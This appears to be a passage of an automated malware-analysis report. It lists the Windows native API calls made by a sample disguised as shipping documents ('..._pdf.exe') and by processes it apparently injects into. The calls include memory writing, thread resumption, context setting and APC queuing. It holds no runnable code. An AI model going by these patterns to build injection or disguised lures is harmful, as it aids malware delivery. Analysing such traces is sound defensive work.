      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F086A EnumWindows,NtSetInformationThread,0_2_020F086A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0D0F NtWriteVirtualMemory,TerminateProcess,0_2_020F0D0F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F91CF NtProtectVirtualMemory,0_2_020F91CF
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F89EB NtSetInformationThread,0_2_020F89EB
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3A46 NtWriteVirtualMemory,0_2_020F3A46
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0A5C NtSetInformationThread,0_2_020F0A5C
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9A7A NtResumeThread,0_2_020F9A7A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3A82 NtWriteVirtualMemory,0_2_020F3A82
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3AAE NtWriteVirtualMemory,0_2_020F3AAE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9AB1 NtResumeThread,0_2_020F9AB1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3AEC NtWriteVirtualMemory,0_2_020F3AEC
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9AE5 NtResumeThread,0_2_020F9AE5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F36F7 NtWriteVirtualMemory,0_2_020F36F7
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9B0D NtResumeThread,0_2_020F9B0D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3B08 NtWriteVirtualMemory,0_2_020F3B08
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9B4B NtResumeThread,0_2_020F9B4B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3744 NtWriteVirtualMemory,0_2_020F3744
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3B40 NtWriteVirtualMemory,0_2_020F3B40
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F2FAB NtWriteVirtualMemory,0_2_020F2FAB
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F37A1 NtWriteVirtualMemory,0_2_020F37A1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9BB3 NtResumeThread,0_2_020F9BB3
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3BCE NtWriteVirtualMemory,0_2_020F3BCE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F97DC NtResumeThread,0_2_020F97DC
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9BEE NtResumeThread,0_2_020F9BEE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F37EC NtWriteVirtualMemory,0_2_020F37EC
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3C06 NtWriteVirtualMemory,0_2_020F3C06
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9804 NtResumeThread,0_2_020F9804
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F982F NtResumeThread,0_2_020F982F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9C2E NtResumeThread,0_2_020F9C2E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3828 NtWriteVirtualMemory,0_2_020F3828
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3C6F NtWriteVirtualMemory,0_2_020F3C6F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F988A NtResumeThread,0_2_020F988A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F989B NtResumeThread,0_2_020F989B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9C99 NtResumeThread,0_2_020F9C99
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3CC8 NtWriteVirtualMemory,0_2_020F3CC8
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9CDC NtResumeThread,0_2_020F9CDC
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F98D4 NtResumeThread,0_2_020F98D4
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F38E4 NtWriteVirtualMemory,0_2_020F38E4
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F24E2 NtWriteVirtualMemory,0_2_020F24E2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F38F0 NtWriteVirtualMemory,0_2_020F38F0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F090E NtSetInformationThread,0_2_020F090E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F990D NtResumeThread,0_2_020F990D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9D09 NtResumeThread,0_2_020F9D09
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0905 NtSetInformationThread,0_2_020F0905
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F451B NtSetInformationThread,0_2_020F451B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0517 NtSetInformationThread,NtWriteVirtualMemory,0_2_020F0517
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3D3C NtWriteVirtualMemory,0_2_020F3D3C
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9941 NtResumeThread,0_2_020F9941
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F395C NtWriteVirtualMemory,0_2_020F395C
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F996B NtResumeThread,0_2_020F996B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F097E NtSetInformationThread,0_2_020F097E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9D74 NtResumeThread,0_2_020F9D74
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3D8C NtWriteVirtualMemory,0_2_020F3D8C
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9998 NtResumeThread,0_2_020F9998
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3191 NtWriteVirtualMemory,0_2_020F3191
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F39A2 NtWriteVirtualMemory,0_2_020F39A2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F55B8 NtWriteVirtualMemory,0_2_020F55B8
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9DB7 NtResumeThread,0_2_020F9DB7
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F09CD NtSetInformationThread,0_2_020F09CD
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F99D3 NtResumeThread,0_2_020F99D3
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9DEB NtResumeThread,0_2_020F9DEB
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3DE9 NtWriteVirtualMemory,0_2_020F3DE9
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F79FD NtWriteVirtualMemory,0_2_020F79FD
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F41FB NtSetInformationThread,0_2_020F41FB
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,1_2_1E3E9A20
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1E3E9A00
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1E3E9660
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,1_2_1E3E9A50
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1E3E96E0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,1_2_1E3E9710
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1E3E97A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,1_2_1E3E9780
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_1E3E9860
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,1_2_1E3E9840
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1E3E98F0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1E3E9910
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9540 NtReadFile,LdrInitializeThunk,1_2_1E3E9540
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,1_2_1E3E99A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E95D0 NtClose,LdrInitializeThunk,1_2_1E3E95D0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9610 NtEnumerateValueKey,1_2_1E3E9610
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9A10 NtQuerySection,1_2_1E3E9A10
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9670 NtQueryInformationProcess,1_2_1E3E9670
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9650 NtQueryValueKey,1_2_1E3E9650
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9A80 NtOpenDirectoryObject,1_2_1E3E9A80
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E96D0 NtCreateKey,1_2_1E3E96D0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9730 NtQueryVirtualMemory,1_2_1E3E9730
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3EA710 NtOpenProcessToken,1_2_1E3EA710
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9B00 NtSetValueKey,1_2_1E3E9B00
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9770 NtSetInformationFile,1_2_1E3E9770
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3EA770 NtOpenThread,1_2_1E3EA770
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9760 NtOpenProcess,1_2_1E3E9760
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3EA3B0 NtGetContextThread,1_2_1E3EA3B0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9FE0 NtCreateMutant,1_2_1E3E9FE0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9820 NtEnumerateKey,1_2_1E3E9820
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3EB040 NtSuspendThread,1_2_1E3EB040
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E98A0 NtWriteVirtualMemory,1_2_1E3E98A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3EAD30 NtSetContextThread,1_2_1E3EAD30
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9520 NtWaitForSingleObject,1_2_1E3E9520
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9560 NtWriteFile,1_2_1E3E9560
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9950 NtQueueApcThread,1_2_1E3E9950
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E95F0 NtQueryInformationFile,1_2_1E3E95F0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E99D0 NtCreateProcessEx,1_2_1E3E99D0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056451B LdrInitializeThunk,NtProtectVirtualMemory,1_2_0056451B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005691CF NtProtectVirtualMemory,1_2_005691CF
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056322E TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,1_2_0056322E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005632C6 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,1_2_005632C6
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005697D3 NtQueryInformationProcess,1_2_005697D3
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00564395 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,1_2_00564395
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00564441 NtProtectVirtualMemory,1_2_00564441
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569804 NtQueryInformationProcess,1_2_00569804
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056443B LdrInitializeThunk,NtProtectVirtualMemory,1_2_0056443B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569C2E NtQueryInformationProcess,1_2_00569C2E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056982F NtQueryInformationProcess,1_2_0056982F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005698D4 NtQueryInformationProcess,1_2_005698D4
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569CDC NtQueryInformationProcess,1_2_00569CDC
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005644EE LdrInitializeThunk,NtProtectVirtualMemory,1_2_005644EE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00564490 NtProtectVirtualMemory,1_2_00564490
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056989B NtQueryInformationProcess,1_2_0056989B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569C99 NtQueryInformationProcess,1_2_00569C99
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056988A NtQueryInformationProcess,1_2_0056988A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569941 NtQueryInformationProcess,1_2_00569941
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569D74 NtQueryInformationProcess,1_2_00569D74
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056456E LdrInitializeThunk,NtProtectVirtualMemory,1_2_0056456E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056996B NtQueryInformationProcess,1_2_0056996B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056450E LdrInitializeThunk,NtProtectVirtualMemory,1_2_0056450E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056990D NtQueryInformationProcess,1_2_0056990D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569D09 NtQueryInformationProcess,1_2_00569D09
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00564522 NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,1_2_00564522
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005699D3 NtQueryInformationProcess,1_2_005699D3
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569DEB NtQueryInformationProcess,1_2_00569DEB
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00563191 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,1_2_00563191
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569998 NtQueryInformationProcess,1_2_00569998
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569DB7 NtQueryInformationProcess,1_2_00569DB7
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00564654 NtProtectVirtualMemory,1_2_00564654
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00563246 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,1_2_00563246
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569A7A NtQueryInformationProcess,1_2_00569A7A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056462E LdrInitializeThunk,NtProtectVirtualMemory,1_2_0056462E
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005632D1 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,1_2_005632D1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569AE5 NtQueryInformationProcess,1_2_00569AE5
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005632E9 LdrInitializeThunk,NtProtectVirtualMemory,1_2_005632E9
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00563288 LdrInitializeThunk,NtProtectVirtualMemory,1_2_00563288
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569AB1 NtQueryInformationProcess,1_2_00569AB1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569B4B NtQueryInformationProcess,1_2_00569B4B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00563349 LdrInitializeThunk,NtProtectVirtualMemory,1_2_00563349
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569B0D NtQueryInformationProcess,1_2_00569B0D
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005697DC NtQueryInformationProcess,1_2_005697DC
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569BEE NtQueryInformationProcess,1_2_00569BEE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569BB3 NtQueryInformationProcess,1_2_00569BB3
      Source: C:\Windows\explorer.exeCode function: 3_2_061F4A32 NtCreateFile,3_2_061F4A32
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549A50 NtCreateFile,LdrInitializeThunk,11_2_03549A50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_03549910
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035499A0 NtCreateSection,LdrInitializeThunk,11_2_035499A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549840 NtDelayExecution,LdrInitializeThunk,11_2_03549840
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549860 NtQuerySystemInformation,LdrInitializeThunk,11_2_03549860
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549710 NtQueryInformationToken,LdrInitializeThunk,11_2_03549710
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549FE0 NtCreateMutant,LdrInitializeThunk,11_2_03549FE0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549780 NtMapViewOfSection,LdrInitializeThunk,11_2_03549780
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549650 NtQueryValueKey,LdrInitializeThunk,11_2_03549650
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03549660
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035496D0 NtCreateKey,LdrInitializeThunk,11_2_035496D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035496E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_035496E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549540 NtReadFile,LdrInitializeThunk,11_2_03549540
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035495D0 NtClose,LdrInitializeThunk,11_2_035495D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549B00 NtSetValueKey,11_2_03549B00
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354A3B0 NtGetContextThread,11_2_0354A3B0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549A10 NtQuerySection,11_2_03549A10
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549A00 NtProtectVirtualMemory,11_2_03549A00
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549A20 NtResumeThread,11_2_03549A20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549A80 NtOpenDirectoryObject,11_2_03549A80
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549950 NtQueueApcThread,11_2_03549950
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035499D0 NtCreateProcessEx,11_2_035499D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354B040 NtSuspendThread,11_2_0354B040
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549820 NtEnumerateKey,11_2_03549820
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035498F0 NtReadVirtualMemory,11_2_035498F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035498A0 NtWriteVirtualMemory,11_2_035498A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354A770 NtOpenThread,11_2_0354A770
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549770 NtSetInformationFile,11_2_03549770
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549760 NtOpenProcess,11_2_03549760
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354A710 NtOpenProcessToken,11_2_0354A710
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549730 NtQueryVirtualMemory,11_2_03549730
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035497A0 NtUnmapViewOfSection,11_2_035497A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549670 NtQueryInformationProcess,11_2_03549670
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549610 NtEnumerateValueKey,11_2_03549610
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549560 NtWriteFile,11_2_03549560
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354AD30 NtSetContextThread,11_2_0354AD30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549520 NtWaitForSingleObject,11_2_03549520
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035495F0 NtQueryInformationFile,11_2_035495F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69DF0 NtReadFile,11_2_00C69DF0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69D40 NtCreateFile,11_2_00C69D40
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69E70 NtClose,11_2_00C69E70
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69F20 NtAllocateVirtualMemory,11_2_00C69F20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69D3B NtCreateFile,11_2_00C69D3B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69E6A NtClose,11_2_00C69E6A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C6E301_2_1E3C6E30
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E472EF71_2_1E472EF7
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4722AE1_2_1E4722AE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E472B281_2_1E472B28
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DEBB01_2_1E3DEBB0
